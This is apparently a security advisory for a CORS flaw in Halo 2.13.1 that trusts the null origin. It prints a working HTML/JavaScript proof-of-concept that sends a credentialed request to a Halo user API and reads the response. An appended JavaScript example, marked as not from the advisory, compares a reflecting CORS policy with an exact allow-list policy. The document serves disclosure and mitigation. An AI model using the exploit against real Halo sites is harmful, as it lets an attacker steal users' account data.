## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted
## Author: nu11secur1ty
## Date: 03/15/2024
## Vendor: https://www.halo.run/
## Software: https://github.com/halo-dev/halo
## Reference: https://portswigger.net/web-security/cors

## Description:
The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain. The application allowed access from the requested origin `null`, and it allows two-way interaction from the null origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the null origin, for example by issuing the request from a sandboxed iframe or a malicious phishing domain with a specially crafted HTML exploit.

STATUS: HIGH- Vulnerability

[+]Exploit:
```HTML
<html>
  <body>
    <center>
      <h2>CORS POC Exploit</h2>
      <h3>Extract SID</h3>
      <div id="demo">
        <button type="button" onclick="cors()">Exploit Click here</button>
      </div>
    </center>
    <script>
      function cors() {
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
          if (this.readyState == 4 && this.status == 200) {
            document.getElementById("demo").innerHTML = alert(this.responseText);
          }
        };
        xhttp.open("GET", "http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-", true);
        // Send the victim's session cookies with the cross-origin request
        xhttp.withCredentials = true;
        xhttp.send();
      }
    </script>
  </body>
</html>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html)

## Time spent:
00:25:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
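The mitigation for the behaviour in the Description is to stop echoing the `Origin` header and to match it exactly against an allow-list that never contains `null`. The JavaScript below is an added example, not code from the advisory or from the Halo project; the allow-list entry, the probe origins and all function names are assumptions made for illustration.

```javascript
// Added example. ALLOWED_ORIGINS, PROBES and every function name are assumptions.
const ALLOWED_ORIGINS = new Set(['https://console.example.test']); // constructed value

// Headers that let a page on `origin` read credentialed responses.
const grant = (origin) => ({
  'Access-Control-Allow-Origin': origin,
  'Access-Control-Allow-Credentials': 'true',
  'Vary': 'Origin',
});

// Weak policy, as described in the advisory: any Origin value, including the
// literal string "null", is echoed back with credentials allowed.
function reflectingPolicy(originHeader) {
  return originHeader ? grant(originHeader) : {};
}

// Returns the serialized origin, or null when the value is "null", malformed,
// not http(s), or carries anything beyond scheme://host[:port].
function normalizeOrigin(value) {
  if (typeof value !== 'string' || value === 'null') return null;
  let url;
  try { url = new URL(value); } catch (e) { return null; }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  return url.origin === value ? url.origin : null;
}

// Hardened policy: exact allow-list match; otherwise no Access-Control-Allow-*
// headers, so the browser does not expose the response to the calling page.
function allowListPolicy(originHeader, allowed = ALLOWED_ORIGINS) {
  const origin = normalizeOrigin(originHeader);
  if (origin === null || !allowed.has(origin)) return { 'Vary': 'Origin' };
  return grant(origin);
}

// Constructed probe origins used to check a policy function.
const PROBES = [
  'null', 'https://untrusted.example.test',
  'https://console.example.test.untrusted.example.test',
  'https://console.example.test',
];

// Lists the probe origins a policy would allow to read credentialed responses.
function credentialedOrigins(policy, probes = PROBES) {
  return probes.filter((o) => {
    const h = policy(o);
    return h['Access-Control-Allow-Origin'] === o &&
      h['Access-Control-Allow-Credentials'] === 'true';
  });
}
```

Running `credentialedOrigins` against both policies shows the difference: the reflecting policy grants all four probe origins, the allow-list policy grants only the listed console origin.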